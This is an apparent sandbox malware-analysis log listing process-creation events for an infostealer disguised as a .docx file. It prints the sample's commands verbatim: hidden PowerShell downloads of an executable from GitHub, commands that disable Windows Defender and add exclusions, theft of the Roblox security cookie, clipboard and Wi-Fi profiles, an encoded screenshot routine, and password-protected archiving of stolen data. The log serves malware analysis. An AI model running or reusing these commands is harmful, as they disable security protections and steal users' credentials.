                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe""Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()""Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
